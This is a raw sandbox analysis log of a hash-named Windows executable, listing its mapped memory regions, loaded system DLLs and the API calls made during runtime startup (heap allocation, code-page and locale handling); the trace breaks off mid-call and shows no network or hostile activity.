# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 05.08.2022 10:59:48.595 Process: id = "1" image_name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" page_root = "0x45537000" os_pid = "0xf08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x77c" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 114 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 115 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 116 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 117 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 118 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 119 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 120 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498440 region_type = mapped_file name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") Region: id = 121 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 122 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 123 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 124 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 125 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 126 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 127 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 128 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 129 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 269 start_va = 0x1a0000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 270 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 271 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 272 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 273 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 274 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 275 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 276 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 277 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 278 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 279 start_va = 0x220000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 280 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 281 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 282 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 283 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 284 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 285 start_va = 0x320000 end_va = 0x386fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 286 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 287 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 288 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 289 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 290 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 291 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 292 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 293 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 294 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 295 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 296 start_va = 0x2540000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 297 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 298 start_va = 0x2670000 end_va = 0x27f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 299 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 300 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 301 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 302 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 303 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 304 start_va = 0x2540000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 305 start_va = 0x2660000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 306 start_va = 0x2800000 end_va = 0x2980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 307 start_va = 0x2990000 end_va = 0x3d8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 308 start_va = 0x2540000 end_va = 0x25d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 309 start_va = 0x2630000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 310 start_va = 0x3d90000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d90000" filename = "" Region: id = 311 start_va = 0x390000 end_va = 0x394fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 312 start_va = 0x390000 end_va = 0x394fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 313 start_va = 0x3d90000 end_va = 0x3eaafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d90000" filename = "" Region: id = 314 start_va = 0x739d0000 end_va = 0x73a4ffff monitored = 0 entry_point = 0x739e37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 315 start_va = 0x3eb0000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 316 start_va = 0x3eb0000 end_va = 0x3f8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003eb0000" filename = "" Region: id = 317 start_va = 0x40a0000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 318 start_va = 0x739b0000 end_va = 0x739c2fff monitored = 0 entry_point = 0x739b1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 319 start_va = 0x390000 end_va = 0x392fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 320 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Thread: id = 1 os_tid = 0xf0c [0064.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9a7fcd80, dwHighDateTime=0x1d8a8ba)) [0064.309] GetCurrentProcessId () returned 0xf08 [0064.309] GetCurrentThreadId () returned 0xf0c [0064.309] GetTickCount () returned 0xf6f818 [0064.309] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=1628352336643) returned 1 [0064.310] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x49ed00)) [0064.310] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0064.310] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2630000 [0064.312] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0064.312] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0064.312] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0064.312] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0064.312] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0064.314] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x214) returned 0x26307d0 [0064.314] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0064.314] GetCurrentThreadId () returned 0xf0c [0064.314] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x49a5e6, hStdOutput=0x49a91f, hStdError=0x26307d0)) [0064.314] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x800) returned 0x26309f0 [0064.315] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0064.315] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0064.315] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0064.315] SetHandleCount (uNumber=0x20) returned 0x20 [0064.315] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" " [0064.315] GetEnvironmentStringsW () returned 0x231ed8* [0064.315] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x0, Size=0xb0e) returned 0x26311f8 [0064.315] FreeEnvironmentStringsW (penv=0x231ed8) returned 1 [0064.315] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x252b980, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0x5f [0064.315] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x0, Size=0xc8) returned 0x2631d10 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x98) returned 0x2631de0 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x3e) returned 0x2631e80 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x56) returned 0x2631ec8 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x6e) returned 0x2631f28 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x78) returned 0x2631fa0 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x62) returned 0x2632020 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x30) returned 0x2632090 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x48) returned 0x26320c8 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x28) returned 0x2632118 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x1a) returned 0x2632148 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x34) returned 0x2632170 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x5c) returned 0x26321b0 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x32) returned 0x2632218 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x2e) returned 0x2632258 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x1c) returned 0x2632290 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x12a) returned 0x26322b8 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x7c) returned 0x26323f0 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x36) returned 0x2632478 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x3a) returned 0x26324b8 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x90) returned 0x2632500 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x24) returned 0x2632598 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x30) returned 0x26325c8 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x36) returned 0x2632600 [0064.316] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x48) returned 0x2632640 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x52) returned 0x2632690 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x3c) returned 0x26326f0 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0xd6) returned 0x2632738 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x2e) returned 0x2632818 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x1e) returned 0x2632850 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x2c) returned 0x2632878 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x54) returned 0x26328b0 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x52) returned 0x2632910 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x2c) returned 0x2632970 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x26) returned 0x26329a8 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x3e) returned 0x26329d8 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x24) returned 0x2632a20 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x30) returned 0x2632a50 [0064.317] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x8c) returned 0x2632a88 [0064.324] HeapFree (in: hHeap=0x2630000, dwFlags=0x0, lpMem=0x26311f8 | out: hHeap=0x2630000) returned 1 [0064.325] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0064.325] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x80) returned 0x2632b20 [0064.325] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x8, Size=0x800) returned 0x26311f8 [0064.325] GetLastError () returned 0x0 [0064.325] SetLastError (dwErrCode=0x0) [0064.325] GetLastError () returned 0x0 [0064.325] SetLastError (dwErrCode=0x0) [0064.325] GetLastError () returned 0x0 [0064.325] SetLastError (dwErrCode=0x0) [0064.325] GetACP () returned 0x4e4 [0064.326] RtlAllocateHeap (HeapHandle=0x2630000, Flags=0x0, Size=0x220) returned 0x2631a00 [0064.326] GetLastError () returned 0x0 [0064.326] SetLastError (dwErrCode=0x0) [0064.326] IsValidCodePage (CodePage=0x4e4) returned 1 [0064.326] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0064.326] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0064.326] GetLastError () returned 0x0 [0064.326] SetLastError (dwErrCode=0x0) [0064.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0064.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0064.326] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0064.326] GetLastError () returned 0x0 [0064.326] SetLastError (dwErrCode=0x0) [0064.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0064.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ젞굓ᦴJĀ") returned 256 [0064.326] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ젞굓ᦴJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0064.326] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ젞굓ᦴJĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" 